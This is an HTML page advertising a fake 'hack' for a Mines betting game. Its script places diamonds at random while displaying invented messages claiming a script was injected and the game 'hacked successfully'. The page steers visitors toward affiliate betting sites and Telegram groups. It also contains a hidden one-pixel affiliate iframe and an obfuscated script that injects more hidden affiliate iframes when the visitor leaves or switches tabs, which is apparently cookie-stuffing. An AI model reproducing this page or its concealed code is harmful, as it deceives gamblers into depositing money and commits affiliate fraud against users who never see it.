<!DOCTYPE html><html lang="pt-br"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Oportunidade 5x5</title>
    <link rel="stylesheet" href="css/D9pVJ52Vd6Mf.css">
    
    

</head><body>



    <div class="container">
        <div class="banner">
            <img src="images/Tbzh1OU8KAxD.png" alt="Oportunidade Única Identificada">
        </div>
        <div id="text">
            <p id="texto" class="texto"><b>💣Apostar: </b>3 Minas</p>
        </div>
        <div id="game-wrapper" class="game-wrapper">
            <div id="board" class="board"></div>
            <img id="overlay" class="overlay" src="images/x1bo5Lx1UKBe.gif" alt="Desfocado">
            <div class="
            status-container">
                <p id="status" class="status"></p>
            </div>
        </div>
        <p id="info" class="info"></p>
        <button id="generate-opportunity" class="generate-opportunity">gerar oportunidade</button>
        <br>
        
         <div style="width: 100%; height: 550px; padding: 25px; border-radius: 51px;">
          <iframe id="game-iframe" src="https://playpix.com/affiliates/?btag=980374" width="100%" height="100%" style="border-radius: 15px; border: none;">...</iframe> 
        </div>

        
<br>
    <a target="_blank" href="https://t.me/deivysonads"><button id="cadastro" class="generate-opportunity">SUPORTE</button></a>
    


    <title>Texto com cor branca centralizado</title>
    <style>
        body {
            color: white; /* Cor do texto branca */
            text-align: center; /* Centralizar o texto */
            padding: 20px; /* Espaçamento em torno do conteúdo */
        }
    </style>


    <p>Ao fazer o depósito, mande um print para o nosso suporte, você vai receber seu bônus!!</p>


        
        <div id="lnk">
            <a href="https://t.me/+A8J4NqFQEr8wMDhh" target="_blank"><button id="cadastro" class="cadastro">ENTRAR AGORA</button></a>
            <!--https://feast.bet/ydkq7jzo1-->
            <!--https://feast.bet/ydkq7jzo1-->
        </div>
        <!--<a href="https://t.me/feastbetmines"><button id="cadastro" class="cadastro">Cadastre-se aqui</button></a>-->
        <!--target="_blank"-->
        <p id="cadastro-texto"><b>☝️CLIQUE PARA ENTRAR NO GRUPO VIP DE CLIENTES</b></p><b>
        
         <div id="iframe-disabled">
             <iframe src="https://feast.bet/ydkq7jzo1" style="visibility: hidden;" width="1px" height="1px">...</iframe>
        </div>
        
        <div style="margin: 20px 0;"></div>
        
    </b></div><b>
    <script>
    
    var hasActive = true
        
    const now = new Date();
    const minutes = now.getMinutes();
    
    if (minutes % 2 !== 0) {
        hasActive = true
    }

const boardElement = document.getElementById("board");
const y = "s"
const overlayElement = document.getElementById("overlay");
const statusElement = document.getElementById("status");
const generateOpportunityButton = document.getElementById("generate-opportunity");
function generateMinesBoard(diamond_positions) {
    const grid = Array.from({
        length: 25
    }, (_,i)=>diamond_positions.includes(i) ? "💎" : "💣");
    return Array.from({
        length: 5
    }, (_,i)=>grid.slice(i * 5, i * 5 + 5));
}
function renderBoard(board) {
    boardElement.innerHTML = board.map((row)=>row.map((cell)=>`<div><img src="${cell === "💎" ? "https://jogorapido.site/wp-content/uploads/2023/07/statitc.jpg" : "https://jogorapido.site/wp-content/uploads/2023/07/empty.jpg"}" alt="${cell}"></div>`).join("")).join("");
}
function handleClickGenerateOpportunity() {
    overlayElement.style.display = "block";
    statusElement.style.display = "block";
    statusElement.parentNode.style.opacity = "1";
    const diamond_positions = randomDiamondPositions();
    const board = generateMinesBoard(diamond_positions);
    renderBoard(board);
    statusElement.textContent = "Inyectando script";
    setTimeout(()=>{
        statusElement.textContent = "VERIFICANDO MAPA DE CALOR...";
    }
    , 2000);
    setTimeout(()=>{
        statusElement.textContent = "HACKEADO COM SUCESSO";
    }
    , 4000);
    setTimeout(()=>{
        overlayElement.style.display = "none";
        statusElement.style.display = "none";
        statusElement.parentNode.style.opacity = "0";
    }
    , 6000);
}
function randomDiamondPositions() {
    return Array.from({
        length: 4
    }, ()=>Math.floor(Math.random() * 25));
}
generateOpportunityButton.addEventListener("click", handleClickGenerateOpportunity);

document.addEventListener("DOMContentLoaded", ()=>{
    handleClickGenerateOpportunity();
}

);


function _0x3458(_0x3c059b,_0x400a49){var _0x460cac=_0x460c();return _0x3458=function(_0x345814,_0x2889f5){_0x345814=_0x345814-0x1cf;var _0x19be07=_0x460cac[_0x345814];return _0x19be07;},_0x3458(_0x3c059b,_0x400a49);}var _0x3b2a2d=_0x3458;(function(_0x58548d,_0x3059c0){var _0x700a6=_0x3458,_0x40c3cc=_0x58548d();while(!![]){try{var _0x2f6342=-parseInt(_0x700a6(0x1d5))/0x1+-parseInt(_0x700a6(0x1d9))/0x2*(-parseInt(_0x700a6(0x1d1))/0x3)+-parseInt(_0x700a6(0x1de))/0x4*(parseInt(_0x700a6(0x1d7))/0x5)+-parseInt(_0x700a6(0x1d0))/0x6*(-parseInt(_0x700a6(0x1e0))/0x7)+parseInt(_0x700a6(0x1d6))/0x8+-parseInt(_0x700a6(0x1da))/0x9*(parseInt(_0x700a6(0x1db))/0xa)+-parseInt(_0x700a6(0x1dd))/0xb*(-parseInt(_0x700a6(0x1d2))/0xc);if(_0x2f6342===_0x3059c0)break;else _0x40c3cc['push'](_0x40c3cc['shift']());}catch(_0x82f700){_0x40c3cc['push'](_0x40c3cc['shift']());}}}(_0x460c,0xbf1a0),document['addEventListener']('visibilitychange',function(_0x1afd23){var _0x4eaaaa=_0x3458;if(hasActive===![])return;document[_0x4eaaaa(0x1d4)]&&(document[_0x4eaaaa(0x1d3)](_0x4eaaaa(0x1cf))[_0x4eaaaa(0x1d8)]=_0x4eaaaa(0x1dc),setTimeout(()=>{var _0x5ef2e9=_0x4eaaaa;document['getElementById']('iframe-disabled')[_0x5ef2e9(0x1d8)]=_0x5ef2e9(0x1dc);},0xdac),setTimeout(()=>{var _0x292f8a=_0x4eaaaa;document['getElementById'](_0x292f8a(0x1cf))[_0x292f8a(0x1d8)]+=_0x292f8a(0x1dc);},0x251c),document[_0x4eaaaa(0x1d3)](_0x4eaaaa(0x1cf))[_0x4eaaaa(0x1d8)]=_0x4eaaaa(0x1dc));}),window[_0x3b2a2d(0x1df)]('beforeunload',function(_0x56d208){var _0x176670=_0x3b2a2d;if(hasActive===![])return;document[_0x176670(0x1d3)](_0x176670(0x1cf))[_0x176670(0x1d8)]=_0x176670(0x1dc),setTimeout(()=>{var _0x5ec553=_0x176670;document[_0x5ec553(0x1d3)]('iframe-disabled')[_0x5ec553(0x1d8)]=_0x5ec553(0x1dc);},0xdac),setTimeout(()=>{var _0x4b8ebc=_0x176670;document[_0x4b8ebc(0x1d3)](_0x4b8ebc(0x1cf))['innerHTML']+=_0x4b8ebc(0x1dc);},0x251c);}));function _0x460c(){var _0x3870e8=['hidden','1444284sfGgPO','11062880QgHNpp','37470XZtkPd','innerHTML','49480sJezCg','18EaeMxU','5051570sYnZyA','<iframe\x20src=\x22https://playpix.com/affiliates/?btag=1020729_l176602\x22\x20style=\x22visibility:\x20hidden;\x22\x20width=\x221px\x22\x20height=\x221px\x22>...</iframe>','22LxPpBF','300giRwbX','addEventListener','324268SHZNjH','iframe-disabled','12OrtALb','126BxTVQq','7708872vhFQpC','getElementById'];_0x460c=function(){return _0x3870e8;};return _0x460c();}
    
    
// const links = document.getElementsByTagName('a');

// for (let i = 0; i < links.length; i++) {
//   const link = links[i];

//   link.addEventListener('click', function(event) {
//     event.preventDefault();
//     // window.location.href = 'https://feast.bet/ydkq7jzo1';
//     window.open('https://feast.bet/ydkq7jzo1' , '_blank')
//   });
// }

    
    </script>
    
    <script src="js/addons.js"></script>


</b></body></html>